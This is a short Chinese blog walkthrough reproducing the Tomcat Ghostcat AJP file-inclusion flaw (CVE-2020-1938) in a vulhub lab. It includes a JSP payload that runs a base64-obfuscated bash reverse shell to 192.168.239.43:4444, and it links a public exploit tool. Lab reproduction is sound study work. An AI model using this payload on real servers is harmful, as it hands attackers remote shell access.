vulhub中Aapache Tomcat AJP 文件包含漏洞复现(CVE-2020-1938)

余生有个小酒馆2024-03-02 13:21

查看tomcat默认页面,此时通过AJP协议的8009端口亦可访问Tomcat。

利用如下工具均可测试漏洞:

工具需要用到python2,

如果需要进一步利用需要向服务器的/webapps/ROOT目录下上传恶意文件

复制代码 
<%Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzOS40My80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}");%>

利用工具https://github.com/00theway/Ghostcat-CNVD-2020-10487

进行执行上传的恶意文件

相关推荐
架构师沉默9 小时前
别又牛逼了!AI 写 Java 代码真的行吗?
java·后端·架构
后端AI实验室13 小时前
我把一个生产Bug的排查过程,交给AI处理——20分钟后我关掉了它
java·ai
凉年技术15 小时前
Java 实现企业微信扫码登录
java·企业微信
狂奔小菜鸡16 小时前
Day41 | Java中的锁分类
java·后端·java ee
hooknum16 小时前
学习记录:基于JWT简单实现登录认证功能-demo
java
程序员Terry17 小时前
同事被深拷贝坑了3小时,我教他原型模式的正确打开方式
java·设计模式
NE_STOP17 小时前
MyBatis-缓存与注解式开发
java
码路飞17 小时前
不装 OpenClaw,我用 30 行 Python 搞了个 QQ AI 机器人
java
Re_zero17 小时前
以为用了 try-with-resources 就稳了?这三个底层漏洞让TCP双向通讯直接卡死
java·后端
SimonKing17 小时前
Fiddler抓包完全指南:从安装配置到抓包,一文讲透
java·后端·程序员
热门推荐
01GitHub 镜像站点02OpenClaw 使用和管理 MCP 完全指南03本地部署 OpenClaw + DeepSeek-R1 完全指南04OpenClaw 连接飞书完整指南:插件安装、配置与踩坑记录05Window 10部署openclaw报错node.exe : npm error code 12806OpenClaw 接入 QQ Bot 完整实践指南07OpenClaw 飞书机器人不回复消息?3 小时踩坑总结08npm-error code 128问题解决方法09OpenClaw macOS 完整安装与本地模型配置教程(实战版)10OpenClaw + 飞书(Feishu)环境搭建指南